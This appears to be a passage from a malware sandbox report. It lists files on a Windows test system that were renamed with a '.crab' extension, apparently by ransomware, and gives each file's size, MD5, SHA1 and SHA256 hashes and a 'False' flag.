c:\system volume information\spp\onlinemetadatacache\{77ac2c2c-d323-4d07-bbbc-9f6908de6f91}_ondisksnapshotprop.crab 3.87 KB MD5: a46e0f5b3e0317913bae4139ed43ea75
SHA1: acfdeafb69ec414c56a0521da4383c1ad4e6c35b
SHA256: bf9e0ac8d4e761576c6b44fe502788ff8a50f58e03783e0b98fed5a1f6950e56
False
c:\system volume information\spp\onlinemetadatacache\{7a521dbe-9658-44e5-843c-29dd5c50d136}_ondisksnapshotprop.crab 3.85 KB MD5: 720cee68a61b206a018308077dfb60af
SHA1: 4e49370e48174b7920b4cd1646248937529da164
SHA256: af17c4dfa0c09d85279d234f043dddb37ab3c07745e942bfc23feff435e622e6
False
c:\system volume information\spp\onlinemetadatacache\{8000ffcd-1da9-461e-a8a6-b9c248869570}_ondisksnapshotprop.crab 3.23 KB MD5: 90c6a691d807188bcdb3cbe6fc0b8632
SHA1: 11d2e9c870a11695e951c5673db2b83f7b5937d2
SHA256: 7d5e4a0675802673cbdc8149cab7cd72eef4c5b94d1e4388f3e843124ff4e59d
False
c:\system volume information\spp\onlinemetadatacache\{8002c55b-b05c-402e-b80d-41cead61f984}_ondisksnapshotprop.crab 3.79 KB MD5: 5368d37774c586a49b18082b4a824976
SHA1: a5bd0afd77730e591f44a5e7ddd1cb5519cd5712
SHA256: 84ff4c8539d00e37171890d5d24cf6707d361ac3fdad30adaeed4fb0fdd2f846
False
c:\system volume information\spp\onlinemetadatacache\{9069688d-befb-4294-b8a6-15447e1f812d}_ondisksnapshotprop.crab 1.43 KB MD5: ed20e28c67b2fa1182f795a493b48dbc
SHA1: 83db7ed57cee960a34320b3fe4f334073d1ade14
SHA256: fc42927488ab6bd0e446e254bf5a36b59b560392e10e6c94446e192aa1ca1c9f
False
c:\system volume information\spp\onlinemetadatacache\{a8f69a00-bbec-42a5-a3ef-bf81814bd449}_ondisksnapshotprop.crab 3.84 KB MD5: c7c0c4e49d347fc84de67173428575ca
SHA1: 5c24a08d6c6a76e11d37581504050bf0aa301bff
SHA256: 04c4a47184fafca9f3d10d26a01bf5da65f11ac4839c1fb764613d7e7d7d071a
False
c:\system volume information\spp\onlinemetadatacache\{b46f41ee-ab11-4c6a-890b-df55c28a4b11}_ondisksnapshotprop.crab 3.55 KB MD5: cc0ec8691e5b290695dc899f78c3f5fd
SHA1: 920f59e60abc7d8fc3ad36b6badd718658bc4058
SHA256: 471bbc9698c602ceb3ce7c86fbd1d6b717460b870befa0d850c2d56373f03388
False
c:\system volume information\spp\onlinemetadatacache\{bbee4aba-5da4-47f0-bd54-17c95dfb7e64}_ondisksnapshotprop.crab 3.95 KB MD5: 1f474232564b1d7f72496ec63d63afb9
SHA1: d1892e1173f98d69a53aafb9f9ba7095a48faed3
SHA256: b4bd14ee62907763fd29c680204f21ab249a146798df492ddbffdf8e681577f5
False
c:\system volume information\spp\onlinemetadatacache\{c3f59859-dd84-4710-b6be-740f016ad023}_ondisksnapshotprop.crab 4.04 KB MD5: 36148c24039582fab4559d59e27c66c2
SHA1: 32506f24e6c3a2e8b421dac12e1b2fcf4b9c6bbe
SHA256: 5620141a0c06a3f52872a41149ff088b76801975d8c4c9a737d9a0d146c1537a
False
c:\system volume information\spp\onlinemetadatacache\{c4c23d0f-5069-470f-9760-27eb797f66c2}_ondisksnapshotprop.crab 1.96 KB MD5: 646426473683121cd785a1c7ef1243b2
SHA1: 5ebb0dee0584828f19cee95a972c5ee606e53001
SHA256: fb3c8b93a6c843be580f6a595d10381a61b080d8ab719b7295498f2a970e88b8
False
c:\system volume information\spp\onlinemetadatacache\{c861246c-5d84-4ff4-a753-bad4631d65ca}_ondisksnapshotprop.crab 3.46 KB MD5: 6d7c77de89891c46ecb49e928edc4e98
SHA1: c9921fbc9b5fe89381699def02f4c966a9e2f42f
SHA256: fe42ac8da8158c4008db9505bce3ca6fca23512b761161568d39c6f991add957
False
c:\system volume information\spp\onlinemetadatacache\{cb7f5435-7d84-4f72-a889-a21e062f0cb6}_ondisksnapshotprop.crab 4.04 KB MD5: ae4b784eabeafa53cbe40b04e4d2e6cd
SHA1: 842874b93af04e1ef182699eaebfb2db1bf9a613
SHA256: fa9190f21848396107fe3fc8678866e22bda98d2e1bbcf81c8094d27a3dc48e7
False
c:\system volume information\spp\onlinemetadatacache\{dbab67da-647a-401e-a02b-58c06249c638}_ondisksnapshotprop.crab 3.74 KB MD5: 78c3e1c04362b9821f586eef8ce96a0a
SHA1: c68d40f86c357191a4ab0a81331e9091a719867d
SHA256: 2e303407dae1eab073b8613b3a23f5928c28128d535586a309ae54ffc5a4ab23
False
c:\system volume information\spp\onlinemetadatacache\{ee224d27-954d-4040-87c6-066b5517487c}_ondisksnapshotprop.crab 1.84 KB MD5: 2dfeefae7e2dc11e9e98b16407601fe7
SHA1: b549c3feebf9868e2793772037b2280a80ff3fa1
SHA256: 2ecd6c8882c129f9561cacc1f15062401490671c7845b2ed0aca2f97d6eed08f
False
c:\system volume information\spp\sppgroupcache\{00c95144-e912-40b3-a2d1-b8e12bc815d0}_driverpackageinfo.crab 55.57 KB MD5: 4d0864f478da72580b95358e7051489e
SHA1: cdcbcb67007517543104ff03ede8db945a600d6d
SHA256: 75eaf0a09c9748dbdbd46448b39667b06523fbf13772d845b992f9afa3f8df1e
False
c:\system volume information\spp\sppgroupcache\{00c95144-e912-40b3-a2d1-b8e12bc815d0}_windowsupdateinfo.crab 0.77 KB MD5: 155badf7b90787f363a5ef93b2176851
SHA1: 2527e993fd45362c70e812800d2a6c719a5d3e7b
SHA256: 9d2f9d72572c8221f1d22c178facf038f10398e80d9fe39fe9f822f6270ad00a
False
c:\system volume information\spp\sppgroupcache\{1ce95dd8-c40b-44fd-a9e6-d72d44ed8f39}_driverpackageinfo.crab 55.57 KB MD5: 37ccfd2610b40c8fbc4d79b118a16164
SHA1: 7bcc7a85daf2b76c0991eb19022cd460e755d362
SHA256: a732568dfbecd59e3a138c4d107c5714de3e62bde268dffe897c638edbb32d41
False
c:\system volume information\spp\sppgroupcache\{1ce95dd8-c40b-44fd-a9e6-d72d44ed8f39}_windowsupdateinfo.crab 0.77 KB MD5: 1bb24c2ff4afa3b43a7be6d34f2e38a6
SHA1: 6e5087d519048bf86b009db4d041e6f3d00e510c
SHA256: 935c60492df40f9b79aa56adf866fd9c885198cbacecea2406f78776079bfeca
False
c:\system volume information\spp\sppgroupcache\{1e9425cc-553b-418f-b0c6-ad1ac9e1ba0c}_driverpackageinfo.crab 55.57 KB MD5: 558702ece22fad5a66fab601f5d0d720
SHA1: f1fbaabcfc6cfaceb34182f6f55a5c6f6bb56174
SHA256: 4f62c75bcca5c97be8b83394d955be8cd6a5f916bcfb25ca77a84c7f7d5eca8a
False
c:\system volume information\spp\sppgroupcache\{1e9425cc-553b-418f-b0c6-ad1ac9e1ba0c}_windowsupdateinfo.crab 0.93 KB MD5: 12a3010cd25aaca20814483449170917
SHA1: d99fd37b7e2a6d1426ec00714bffaf08be8796bc
SHA256: 54f0aa32c1fbb8ed214c144a09e014d938c0772229b869e4fac4000d7ea618a3
False
c:\system volume information\spp\sppgroupcache\{29088c66-de5f-456f-85c0-6e4156f94358}_driverpackageinfo.crab 55.57 KB MD5: c776033df67dc57b104fcce49cfd4687
SHA1: be07cdb7ea02e9d3e327c585478aa447e52edec6
SHA256: 0f3f4c87330e7d215f1aa20470ee015ec468185e5b2c5704abfdabb580d84caf
False
c:\system volume information\spp\sppgroupcache\{29088c66-de5f-456f-85c0-6e4156f94358}_windowsupdateinfo.crab 0.93 KB MD5: 2ac19e9d6ae2bd7aefd449d014b3cc2a
SHA1: 829db42ae6476add9681bc70bd76b930c60af064
SHA256: 4b02c10cb7dd38c3b7e941f18fd176635453cc617055dfd3dd8c313d8991b6f4
False
c:\system volume information\spp\sppgroupcache\{29296136-1f54-4fd8-b5c7-32fc96ef3c76}_driverpackageinfo.crab 55.57 KB MD5: 81b5360b3becb75c5bc01912b2ce3188
SHA1: 0007da4d775acc177c1621d1a9504c737181c2aa
SHA256: 146014c676af336c6bb7499d0fab793d7d787ecb6a7b9bb5059ca994f03ecd59
False
c:\system volume information\spp\sppgroupcache\{29296136-1f54-4fd8-b5c7-32fc96ef3c76}_windowsupdateinfo.crab 0.93 KB MD5: e13f4a2303ad654544365c3fd900f8f1
SHA1: cef492647f07b1fe6218d8930da0378f791817fe
SHA256: 25034cd46cb5fdfea35a3b1d89ed17c57b22ba4e50ccd8059d05ec3179d5a32a
False
c:\system volume information\spp\sppgroupcache\{4204ee1b-0338-4788-b199-d83e4955faf1}_driverpackageinfo.crab 55.57 KB MD5: 540d368ef25e13454ce083ceed1c635a
SHA1: 4a5e42e677d72dae63a90155da7982306139a53e
SHA256: 294e0fce36f7f03b04815e8ac5a6d85e9f8d4061784efc639e49e7e32da47b15
False
c:\system volume information\spp\sppgroupcache\{4204ee1b-0338-4788-b199-d83e4955faf1}_windowsupdateinfo.crab 0.88 KB MD5: 1250dfbe50f8e11bb84b20ed060abefb
SHA1: 62cf31f356db6f9f017496aecd267a934357e6de
SHA256: f59643bfe08dffb2c9dd44f4349582ec2c1c6989814e2430f15c2c95a4c62958
False
c:\system volume information\spp\sppgroupcache\{425865b3-1a09-4be3-8a97-1baffda74ed0}_driverpackageinfo.crab 55.57 KB MD5: 1ca5e90426a6bb86b2e0ea46eaf6805c
SHA1: 66478a65624052ba2d15179a5fe74828f600540f
SHA256: 7c8e9652b82833cd4869acc2d66392fc2cf3d31e0d63e43fad6bd538547fd10a
False
c:\system volume information\spp\sppgroupcache\{425865b3-1a09-4be3-8a97-1baffda74ed0}_windowsupdateinfo.crab 0.77 KB MD5: 1c6b35df9a98a71d369b0bf9ed9d4992
SHA1: 354153110d212c66456e58cbb19895cfd28cce02
SHA256: d64cb634bf935ad6578120daada2aa3d9b403c8c74afd63bd036371b554a3508
False
c:\system volume information\spp\sppgroupcache\{51296d62-5aa5-412e-9a8f-abe77cd15e9e}_driverpackageinfo.crab 55.57 KB MD5: 720a71a79cf4b48fab2d17a505a0ebca
SHA1: f3daf13d320e09a334b35f504ed3d55f76904f48
SHA256: db966c3643db55010c21fa56435d35bcd837bbd58ac25150e54b72d4a3fb5c7f
False
c:\system volume information\spp\sppgroupcache\{51296d62-5aa5-412e-9a8f-abe77cd15e9e}_windowsupdateinfo.crab 0.77 KB MD5: 466d3115c2f76b5f3aabd40f948f91b9
SHA1: 126bd4258239fa275a99b8ebd6cbabd82c0db981
SHA256: dc7bf2ef6b0f857edca215ee2f6814b0a15c67dcd2b5229896f027005e28de3d
False
c:\system volume information\spp\sppgroupcache\{5ac56584-2304-47b9-b262-8d3164a52d9e}_driverpackageinfo.crab 55.57 KB MD5: 52dd59a8fbe97826568e69d9dd43aaa2
SHA1: a1afdf07101db620e68bc2505db5ffb10f18c3a9
SHA256: 0b98ab7ecd8e1f90d9df89775307fcd165d87afe6a07825d85847777e80ba32f
False
c:\system volume information\spp\sppgroupcache\{5ac56584-2304-47b9-b262-8d3164a52d9e}_windowsupdateinfo.crab 0.77 KB MD5: fd2195643f5e2d61252d11dcad451635
SHA1: a5b6e0f054d190ce02d0525919022a6b15da98cc
SHA256: 65faaaa2819cdf9838fafe3f70fab0f372f8044cce1405e6eb542db38f112880
False
c:\system volume information\spp\sppgroupcache\{77ac2c2c-d323-4d07-bbbc-9f6908de6f91}_driverpackageinfo.crab 55.57 KB MD5: df6b7b9247faa2bca752936664984839
SHA1: 3c752d279b9322c99d70133edd715acf66ea2403
SHA256: 7f4b816179576bf158dbf9b5d18974fb7ae3058cef94685b0da37bb2addf8a4b
False
c:\system volume information\spp\sppgroupcache\{77ac2c2c-d323-4d07-bbbc-9f6908de6f91}_windowsupdateinfo.crab 0.93 KB MD5: 67baccae601bf108e3715feaf7763755
SHA1: 2c0c3933bd63c8b66f15248a08b241e5a6b95b90
SHA256: 1ce58e60e5d503eded6cf06148f36be5cdf0ad035f63799e330e830504d496d4
False
c:\system volume information\spp\sppgroupcache\{7a521dbe-9658-44e5-843c-29dd5c50d136}_driverpackageinfo.crab 55.57 KB MD5: dd203c350d3910f1a5c00c4e07a33442
SHA1: 04838c1c91630a51757ee3b05e9b679b1befcd91
SHA256: 4e5a1150dd0732a3f78474c88e233fecf21d711ba3539f447d82c223cb47fc86
False
c:\system volume information\spp\sppgroupcache\{7a521dbe-9658-44e5-843c-29dd5c50d136}_windowsupdateinfo.crab 0.93 KB MD5: a875ee7a645f602ab06c164a5edb3bb7
SHA1: 60b9604b8c0276cf98803d168aa304b90eebfe62
SHA256: 0266967b19782323f1cc957a5becb73a71c837befe7c84632e84c73f3c5618d8
False
c:\system volume information\spp\sppgroupcache\{8000ffcd-1da9-461e-a8a6-b9c248869570}_driverpackageinfo.crab 55.57 KB MD5: 9882fc1e1d1270e2b22f49ec9374283d
SHA1: f537ff73ad678dcb4f343a55844fa062f6d3a42d
SHA256: c4fd916129d6772d18065327c4ebd9b0e8c22f228a2766ebbbc0f3956694740c
False
c:\system volume information\spp\sppgroupcache\{8000ffcd-1da9-461e-a8a6-b9c248869570}_windowsupdateinfo.crab 0.77 KB MD5: f531d6bd0697cbc5b01972da953280a1
SHA1: e71ca4fc81f76c198b1ef852e5204c24fdd677af
SHA256: d6dee793c84a4e1c58d049d950f057689ad856b3826e5ee2e002bcac344b2420
False
c:\system volume information\spp\sppgroupcache\{8002c55b-b05c-402e-b80d-41cead61f984}_driverpackageinfo.crab 55.57 KB MD5: 682c12c3e355394b1324e6cee47ec85c
SHA1: 81ba2cbfc77e4f7ac4b98832fe6c35274e52299f
SHA256: 6e5263229b5ddebb30d87e7aac7cc07bd519d73d80cae13e4816202d3025e415
False
c:\system volume information\spp\sppgroupcache\{8002c55b-b05c-402e-b80d-41cead61f984}_windowsupdateinfo.crab 0.93 KB MD5: ab1a0b67aa29b31aa94d3c0b4b2fdd79
SHA1: 75ecbbbc826de0171567b26a5650f830add7c7ff
SHA256: a796b1eed72f8fb60d52864b0347ab8b7d2c793fd7f384294539ce26df380b8d
False
c:\system volume information\spp\sppgroupcache\{9069688d-befb-4294-b8a6-15447e1f812d}_driverpackageinfo.crab 55.57 KB MD5: 092a106b90d25f8379b23d33276f2a86
SHA1: 28e9cba1f100267b30c33181e9354b6069f582a4
SHA256: 5bd678cd31b731da6c9eaf2cae5d783d8de97c60bfa39d4eeb47cfe4b4191b64
False
c:\system volume information\spp\sppgroupcache\{9069688d-befb-4294-b8a6-15447e1f812d}_windowsupdateinfo.crab 0.77 KB MD5: b45ef8489ee6598f065628bfce3698f6
SHA1: 21eaf84c1960a45e19d438055708a26edbe01d4b
SHA256: c67b8f8cee729911829afd57015197a4e4d62c43e6b597bd922c6bc9e597e3c0
False
c:\system volume information\spp\sppgroupcache\{a8f69a00-bbec-42a5-a3ef-bf81814bd449}_driverpackageinfo.crab 55.57 KB MD5: 6db47c008f840894e0cad7e9241adfc7
SHA1: 2e5c6488404ef793aabc79eecf127d0fedd93e0a
SHA256: 3d908ab1f94ee09efb092da44ec06db281370e19d5e34685276b2402c5295fe2
False
c:\system volume information\spp\sppgroupcache\{a8f69a00-bbec-42a5-a3ef-bf81814bd449}_windowsupdateinfo.crab 0.93 KB MD5: 399a040dadb9cdc998b32757726a8d2a
SHA1: e537f2d97bf4bb5b4763312219ae35d00fe25a31
SHA256: 50d19d47a8be0852bd99d3c91d696fb3f0d30e1f8c25a12510cd52cf3108e5df
False
c:\system volume information\spp\sppgroupcache\{b46f41ee-ab11-4c6a-890b-df55c28a4b11}_driverpackageinfo.crab 55.57 KB MD5: 8040ba6cfa273638c4f03cc97fbcd103
SHA1: 376b31578f91d48c0d59078126fe7d2d79b6c6ca
SHA256: c98f2bb8785e0d70614c83def9b47bd4f3c1f8685f8aeb730d2916ba3070ba83
False
c:\system volume information\spp\sppgroupcache\{b46f41ee-ab11-4c6a-890b-df55c28a4b11}_windowsupdateinfo.crab 0.88 KB MD5: 68fbfc3565a2a595b36099908ed1741d
SHA1: a12edd4d155f4748662131a7d09f63c1ecdbcbc8
SHA256: e04cd76089c571995233867f6d4ce80c53ec0c50ccb833eeeed6178708d84e6e
False
c:\system volume information\spp\sppgroupcache\{bbee4aba-5da4-47f0-bd54-17c95dfb7e64}_driverpackageinfo.crab 55.57 KB MD5: ad8631245cda3d5cde5375b9369ef746
SHA1: b7ab2531794bc36bb7ff5ca2c8c0549d7601e9ca
SHA256: 7e92e5c38f481c5a4a9291196fb8e6c68bee0e37265273782077f888e4013c0e
False
c:\system volume information\spp\sppgroupcache\{bbee4aba-5da4-47f0-bd54-17c95dfb7e64}_windowsupdateinfo.crab 0.93 KB MD5: ff5f25c5b88da62ca61a5de87e3286d7
SHA1: 767c4ad72b6946feec3d8e0b276ba32982fab4bb
SHA256: 8267bda13d6a59b397aab310813a670bbeed6fa96dab509e5383b0bd63c0ebce
False
c:\system volume information\spp\sppgroupcache\{c3f59859-dd84-4710-b6be-740f016ad023}_driverpackageinfo.crab 55.57 KB MD5: ba71d45188f1caf42398568b9746d4bd
SHA1: 4ac98cda6b1406c5e1159af8b5eee8c5dc6c119b
SHA256: 8655a9a710c85b26d981a57cea1bb18680b33fef777a3512618ec706d990d63b
False
c:\system volume information\spp\sppgroupcache\{c3f59859-dd84-4710-b6be-740f016ad023}_windowsupdateinfo.crab 0.93 KB MD5: fbfd425cf3eaff80f254902fd2af5d2d
SHA1: 7f3adbc202689a6c04f0f92eda9da510fdd38bf7
SHA256: f1c6765b22f3196114e3c173035ffa7dd43add3d4e11c2f760681566d2ea951f
False
c:\system volume information\spp\sppgroupcache\{c4c23d0f-5069-470f-9760-27eb797f66c2}_driverpackageinfo.crab 55.57 KB MD5: bff0f0e4e051c16d7946a931cd023451
SHA1: ebe86e831b11eff0f8b9925a9a41151c889dcd50
SHA256: d5add29d6252e3ffb2512c64379c289cac725823fad9ef010690c5246f4f6e01
False
c:\system volume information\spp\sppgroupcache\{c4c23d0f-5069-470f-9760-27eb797f66c2}_windowsupdateinfo.crab 0.77 KB MD5: 75ae51fbd84b6435525ab7a42b17fcf8
SHA1: 66ed00f0666f62babd4f02868b5a31b1325a71c6
SHA256: cfd172d60a3a7675317d5df0ae79b398cbe0e2ac674db0b23b1744ba75cfd361
False
c:\system volume information\spp\sppgroupcache\{c861246c-5d84-4ff4-a753-bad4631d65ca}_driverpackageinfo.crab 55.57 KB MD5: 1c00067d6f774e3a337fd050240b17fe
SHA1: 199bfeaf471a28f5728db28e65ba1bc5f35844cf
SHA256: cf4a3c1a0e4933a303cf9a6f6523e7c8a33dc3432e2dc7c4f430ddd62985e933
False
c:\system volume information\spp\sppgroupcache\{c861246c-5d84-4ff4-a753-bad4631d65ca}_windowsupdateinfo.crab 0.77 KB MD5: a809c8e30c3dcc1122bc79b9f8940896
SHA1: d275b417e99b03be1ec3a581b823fb6ac46febbc
SHA256: 035b39b0f816b0d70ddab0c6fe4d74900e1e60fbb94de9d5c25c5c9b13bd0b03
False
c:\system volume information\spp\sppgroupcache\{cb7f5435-7d84-4f72-a889-a21e062f0cb6}_driverpackageinfo.crab 55.57 KB MD5: 305d08c4005b0124d2887e66c15c3a3c
SHA1: 106f10df354c4f877e1fed2e7be63baee65ee024
SHA256: d94bf92b581ea1af512b6ff77411b7b364a16346f150320d85e46881e84ce69e
False
c:\system volume information\spp\sppgroupcache\{cb7f5435-7d84-4f72-a889-a21e062f0cb6}_windowsupdateinfo.crab 0.93 KB MD5: b0410d534a02bd82c61f6195328caba4
SHA1: 3249c4cb685ea215d45c4a54214c1ab28c7dd737
SHA256: b99cb56bdc728eb9f92f42b5b1b12d7b99669422d439c5c7246948d6aef2c24e
False
c:\system volume information\spp\sppgroupcache\{dbab67da-647a-401e-a02b-58c06249c638}_driverpackageinfo.crab 55.57 KB MD5: fae52d84fdd0e581c80928adf3ce6352
SHA1: a50eabd337316b2431dfdc9f61b1eaf80daa2285
SHA256: d333cbad4c7475bc8f1f142e3afdfc44e0029ff8b7b53c81e760d681ba64309a
False
c:\system volume information\spp\sppgroupcache\{dbab67da-647a-401e-a02b-58c06249c638}_windowsupdateinfo.crab 0.93 KB MD5: 0d824cd39e767cddf5339299f89f7f29
SHA1: a87fe3a38fa5e131392e8cec96ee056b82d67fc1
SHA256: f55400a7cc2457cc1943c6d15c3852a0f97c8b59ad126907e01a31010ba8963e
False
c:\system volume information\spp\sppgroupcache\{ee224d27-954d-4040-87c6-066b5517487c}_driverpackageinfo.crab 55.57 KB MD5: c80366540a3ce8868e783b9732812eb2
SHA1: 84b227834e1dc0354ef5aa98b5625475d3f52f28
SHA256: a980f73c5af94dfd1d2ed6667595b1622a4be057812404ad6f4e861ff7243790
False
c:\system volume information\spp\sppgroupcache\{ee224d27-954d-4040-87c6-066b5517487c}_windowsupdateinfo.crab 0.77 KB MD5: 2176c9534c3658366c29ce8e7e669ef1
SHA1: ef58e1c8812d262a803df697e60af4a0cd23adba
SHA256: a4fd38df834a091d73f2c0b6b45272b546e742c48f1fbcd9e2ed2ab7c398efac
False
c:\system volume information\syscache.hve.crab 256.51 KB MD5: 4eedecb1129348b7aa54be9feb25e001
SHA1: 42f53dbfe25ad3c9086da2ef085608f01447bcb9
SHA256: 02ff7a6013a126fa0292380aeb18f851f592332eca3b51d47cf177f0122cb9c3
False
c:\system volume information\syscache.hve.log1.crab 41.51 KB MD5: 3138483f79f8f0b1853a6c9c1def91a1
SHA1: dc57e805679fb3ded2553bac13c165c0033249fb
SHA256: e394a2794a3d6776b6b17750796091f464db0ffa5d061a1d40ce5040f3ac35d7
False
c:\system volume information\tracking.log.crab 20.51 KB MD5: fdf8183d0df49ae11ef35a19cd314f97
SHA1: 9bad5cee673d2ab98b1521d4596d9115b0f69797
SHA256: c744d415f0d063f365b74e350bd540956ae1a22b9bdd33f67f468a1da0de0201
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\2-qs7qkxl_g.mp3.crab 84.98 KB MD5: 7648fda1318782245c3000a23d3a4e4d
SHA1: 5fd6c0ed10aa459795a165881b022b01558ba38e
SHA256: 7deebde919541c097676883e4d587255e356ea85d9127c67a5cd28cafa7db384
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\5brnm_4g.avi.crab 40.91 KB MD5: 36b5ca358e8850b1d302ac83b7f0de6f
SHA1: 5cbe222906a8d1bd42e89f064ca6a3c5b34458c1
SHA256: 721d782e6a672bc38268e730561dde7db781bed4fd5d6a9dc5e4976e90a97f7b
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\6ttzabrupckj.mp3.crab 30.82 KB MD5: 6adc244d57503abb563bf4b6a78106b7
SHA1: cd455aaba109eb3e97a2708ae46324e4aece4627
SHA256: d4a99205a66c225a308c0963a4b03ca3f83344ea2b828a9ba0c1455a644b6b69
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\8l7q06ltven.m4a.crab 54.15 KB MD5: 69613e9d0ef63b1b1ae07e6b1bc70222
SHA1: 54655345f5ba50a87a75e7eb6cbc3859b0b1511f
SHA256: 6e70d082a29eb845514ce753cc1f4c9098ee4b6f5fd502bbcc14a1a5cb5e9f38
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\adobe\acrobat\10.0\javascripts\glob.settings.js.crab 0.52 KB MD5: c8dd7e9045270143a693ada15e4ba384
SHA1: de6c345f12b1fe68f8519adec8134eebd6961c80
SHA256: 60e780e8f953db7f8b2a35d46c3ef7f3b4732d410c474eab8dbc7841fe9436bd
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\adobe\acrobat\10.0\security\addressbook.acrodata.crab 5.79 KB MD5: 7e7db7050a480dc03810ac568568b564
SHA1: d1a6949e3435b62bf98b91bbbdcd45dd97dbaa6e
SHA256: 76520457b9c80cc7f253bd65e3680cfd34748dfbd41f7ab4de84483dd8bb1994
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\adobe\acrobat\10.0\security\crlcache\48b76449f3d5fefa1133aa805e420f0fca643651.crl.crab 1.43 KB MD5: 2f5f6bdf08960e1752237ea567a3a844
SHA1: 286d00bd49f25c60d71e1f75890bb79312a2e01a
SHA256: 33459fbf6278ffe25f396b48b8d9e08769c3129ca401b1365002e6ba56d68164
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\adobe\acrobat\10.0\security\crlcache\a9b8213768adc68af64fcc6409e8be414726687f.crl.crab 37.34 KB MD5: dd98ff3b9ca1df07014e724a88dc33c4
SHA1: cef33772573649d1004236dd69165a41f7c89dfe
SHA256: 75977431a49d5a97f013275f3654d699aceb6b65c664c6921caf328dc7d9469a
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\c-kxv0pbgc_miabaao14.mkv.crab 55.51 KB MD5: 1ddaf1c224d150b78f4d410b853301df
SHA1: 04da0f59c2a5306d096b752250d0369310aafe33
SHA256: 77ebaa3779e12c2032fd12e628d56e23158bea921e8a813f2cfb0a17c4b6e5cc
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\ccv_ue4.xls.crab 16.93 KB MD5: 8b5efee88d745a69fb363c94ae8b0b6a
SHA1: 55145910b36e3fbb6e154233bd15b002a3238d49
SHA256: 67bf484b2f49551636f52a3f01a304698253715ceb228ae9e04eabaaa32a7f21
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\e8zgiu 7wump.avi.crab 71.24 KB MD5: b75c2c3d255b7ed1dd720e318394bca8
SHA1: 4f12b784c64f9ac87e749a294ea15ab38c248410
SHA256: 0bc0d45c1e5b0979952a2f9d7ef13a1c9332e1014e41d564c52a97a288422392
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\efealxa3rfh.gif.crab 15.63 KB MD5: 9fad86406cf9541259cc38cb6b9fd8d2
SHA1: 70b498dbb8cef523fcd77ff005808a39c5202d6b
SHA256: be242fd7159346489c2dfa2eaef62229a571518245fcfb5e3fca1ef3adb17843
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\fkv-4yt.avi.crab 53.62 KB MD5: 310311b0e07f23bebbd9139317eee69c
SHA1: e938857ce1b787a77bbef84d4ba664b2a7cd8681
SHA256: 77e7c98cedb2cd38f0fc67db0297e7a283c4e002767547a4abecfecec6fe940e
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\h1ocpap4n8fgc.swf.crab 43.32 KB MD5: 02ba599943fc69c06fd2b70df06e5eb3
SHA1: 4995d4fdf89d06d3b06a8359ad534ec3daeac21b
SHA256: 6cbad101df2bdbb45443825d72cb62774eddbcf32960de518615d9da9d00bdd1
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\hjl6.odp.crab 34.15 KB MD5: c0087c11ec83643395b1c51c27e7e31a
SHA1: e3cd618f7edf2b0893d80db60ae8333910342ae4
SHA256: 981d9ff82c45c9b74e938d312eada6bd52b167bf734165cced944107bcc16644
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\hjwxsmbu5av_b.flv.crab 53.49 KB MD5: cb05f96aecb72709efa37d0e0b7ea9e8
SHA1: db5c5eaf4a3169457e8ccc3cc752b23d47b55a0a
SHA256: 311907423932d0de4e018a31f678d3c580289705ba4891d92519b51c141ed6bd
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\hm9gacaxvusm8zhpocg7.avi.crab 100.12 KB MD5: 782716c31f1b4631b41093fe7e2b8613
SHA1: 4778907ee7af176f2e1d9853713d35c48b32c079
SHA256: 9a40ca9649ce37513e79b492bd63a98e877fefb019928200f3abd025d030780f
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\httpvnvqonavjdlxebf.gif.crab 65.10 KB MD5: 88442769483abecab4e5fabc28740b82
SHA1: 79a568506e35f48c392b14043f10e6170dd38d17
SHA256: b54978b7c4fa20ce4a314a56bea0d13ac1646acc23fe8814ecd2e8fb44811589
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\judrea4jdibkj.mp4.crab 62.30 KB MD5: 52fbd86b8c5e9b14c5b66a736260aa5c
SHA1: 6f0c8b37582ed3b4eb05f187e8d94a77ee4e7ecc
SHA256: 543557a813bd7e82aea7a935498084babb4fa7000fba2699bbbd183f4be60de4
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\lahy.m4a.crab 63.93 KB MD5: 98902ee92243b69bd467637f6877e495
SHA1: de33787e391d09c700eaeacc60ed4780b63bdb01
SHA256: 2bd07cfeda337c1d3c0610cd74f0463e3f802ddac6b04e71b4b89ae07e2123ca
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\settings.sol.crab 0.98 KB MD5: f6333e579f6f836c123693a68d995605
SHA1: e7bed8b03714d7823445cd03b8904b5b9dd67a23
SHA256: c46dd910b818cb31e19854d3a3f122448b48f4ae1ab18c033fc0edb61403a7de
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\crypto\rsa\s-1-5-21-3388679973-3930757225-3770151564-1000\83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.crab 0.55 KB MD5: e99a9edab8b29813de14af6b1e27c8a4
SHA1: 117846b32f99dd3dab808efc09511735ea537101
SHA256: d2305c8158b48e6e44291c3335826cf10b454124e9659e701c8653e9b8f05995
False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\crypto\rsa\s-1-5-21-3388679973-3930757225-3770151564-1000\932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.crab 0.60 KB MD5: dbf521dcf262c910892dcc8bffb3f718
SHA1: 1ffe032837091cbc61e1d6922a347e3a252b3a50
SHA256: a16a2aa06b25d6b97613bb07588ea396517421fa8eecb7be59f01f2b9e01d038
False
